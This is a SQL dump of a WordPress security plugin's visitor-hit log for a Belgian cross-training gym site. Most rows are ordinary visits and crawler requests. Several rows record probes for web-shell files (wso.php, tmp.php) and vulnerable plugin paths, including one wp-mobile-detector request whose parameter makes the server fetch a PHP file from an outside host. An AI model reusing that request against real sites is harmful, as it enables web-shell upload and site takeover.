(76710, 1499238737.121167, 1374822686, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A520F/A520FXXU1AQD3 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76711, 1499238759.133300, 520974775, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76712, 1499238764.794417, 1374822686, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A520F/A520FXXU1AQD3 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76713, 1499238771.146932, 1538774068, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'https://l.facebook.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76714, 1499238775.931662, 1538774068, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76715, 1499238792.436078, 1374822686, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A520F/A520FXXU1AQD3 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76716, 1499238805.139349, 1538774068, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76717, 1499238814.974151, 1538774068, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76718, 1499238851.484753, 1538774068, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76719, 1499238852.808387, 1538774068, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76720, 1499238859.800784, 1374822686, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://m.facebook.com/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/124.0.0.43.69;]'),
(76721, 1499238863.312934, 1374822686, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/124.0.0.43.69;]'),
(76722, 1499238865.494968, 1374822686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/124.0.0.43.69;]'),
(76723, 1499241565.168932, 1538774068, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76724, 1499241568.148786, 1538774068, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76725, 1499249072.571645, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(76726, 1499253424.440417, 786801762, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(76727, 1499255255.317266, 2783008843, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),
(76728, 1499255256.870770, 2783008843, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),
(76729, 1499257136.043271, 3024883609, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76730, 1499262293.695407, 1538595673, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76731, 1499262296.904682, 1538595673, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76732, 1499265300.911215, 96260888, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76733, 1499265302.659196, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76734, 1499265303.247309, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76735, 1499265303.839050, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76736, 1499265305.429992, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76737, 1499265306.256454, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76738, 1499265306.907539, 96260888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76739, 1499267337.122790, 3281714082, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wso.php', 'http://www.crosstrainingcenter.be/wso.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(76740, 1499270299.971260, 1401321089, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://m.facebook.com/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/124.0.0.43.69;]'),
(76741, 1499276758.228377, 783509116, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76742, 1499276758.858162, 783509116, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76743, 1499276759.333011, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76744, 1499276759.797528, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76745, 1499276760.258260, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76746, 1499276760.721578, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76747, 1499276761.289831, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76748, 1499276761.761467, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76749, 1499276762.305834, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76750, 1499276762.838229, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76751, 1499276763.517972, 783509116, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76752, 1499277780.763905, 3475901895, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76753, 1499280689.071324, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76754, 1499285574.389059, 1538595673, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76755, 1499286907.923883, 3585737171, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mediatoolkitbot (complaints@mediatoolkit.com)'),
(76756, 1499310393.891142, 3024883468, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76757, 1499310395.553069, 3024883600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(76758, 1499310820.392799, 2521214258, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(76759, 1499319449.801241, 3104369886, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76760, 1499319451.958800, 3104369886, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76761, 1499319454.098234, 3104369886, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(76762, 1499320378.537709, 2995873941, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76763, 1499322456.950729, 2637637423, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76764, 1499324609.997501, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76765, 1499324610.682042, 3249721826, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0ahUKEwismKWIi_TUAhUFXhoKHajuAHYQFgiRATAK&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Fles-seances-namur%2F&usg=AFQjCNF3CZXOTpgEhukKBcCq_alqy9J0kw', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76766, 1499324611.221893, 3103966404, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76767, 1499324611.613036, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76768, 1499324611.779624, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76769, 1499324611.991720, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76770, 1499324612.016037, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76771, 1499324612.047416, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76772, 1499324612.742484, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible;)'),
(76773, 1499324613.626478, 3249721826, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/4.0 (compatible;)'),
(76774, 1499324613.723752, 3249721826, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76775, 1499324614.462735, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76776, 1499324614.636526, 3249721826, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/4.0 (compatible;)'),
(76777, 1499324614.720160, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76778, 1499324614.889492, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible;)'),
(76779, 1499324614.894960, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/4.0 (compatible;)'),
(76780, 1499324614.993356, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible;)'),
(76781, 1499324615.559752, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/4.0 (compatible;)'),
(76782, 1499324615.735912, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible;)'),
(76783, 1499324616.025311, 3249721826, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76784, 1499324617.664326, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-limelette/feed/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76785, 1499324617.754745, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76786, 1499324617.868996, 3103966404, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(76787, 1499324618.563249, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76788, 1499324618.653221, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76789, 1499324618.754363, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/4.0 (compatible;)'),
(76790, 1499324619.193556, 3249721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/4.0 (compatible;)'),
(76791, 1499331651.129647, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76792, 1499331651.727936, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76793, 1499341398.817753, 3512959709, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(76794, 1499342673.557675, 1054012869, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(76795, 1499350716.661471, 3373404845, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(76796, 1499350718.032880, 3373404845, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.laptopscreenrepair.net.au/search/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(76797, 1499350718.832709, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/cache/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(76798, 1499350720.554942, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(76799, 1499360540.034878, 1375071234, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76800, 1499360553.375654, 1375071234, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76801, 1499360567.882638, 1375071234, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76802, 1499369209.768819, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76803, 1499369210.870395, 872366427, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76804, 1499370152.967359, 1430848841, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/tmp.php', 'http://crosstrainingcenter.be/tmp.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76805, 1499375724.317635, 2637637423, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76806, 1499381830.757444, 872366348, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76807, 1499385340.802551, 3475901829, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76808, 1499385828.359690, 3475901829, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76809, 1499415832.558273, 3251245561, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.bing.com/search?q=cross+training&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76810, 1499415834.729380, 3251245561, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76811, 1499415856.863963, 3251245561, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76812, 1499415858.585254, 3251245561, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76813, 1499415910.326601, 3251245561, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76814, 1499419112.252370, 2637637423, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76815, 1499419179.500288, 2637637530, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76816, 1499426336.376564, 1838091214, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76817, 1499426336.980428, 1838091214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76818, 1499426337.483175, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76819, 1499426337.979637, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76820, 1499426338.450976, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76821, 1499426340.694957, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76822, 1499426341.541468, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
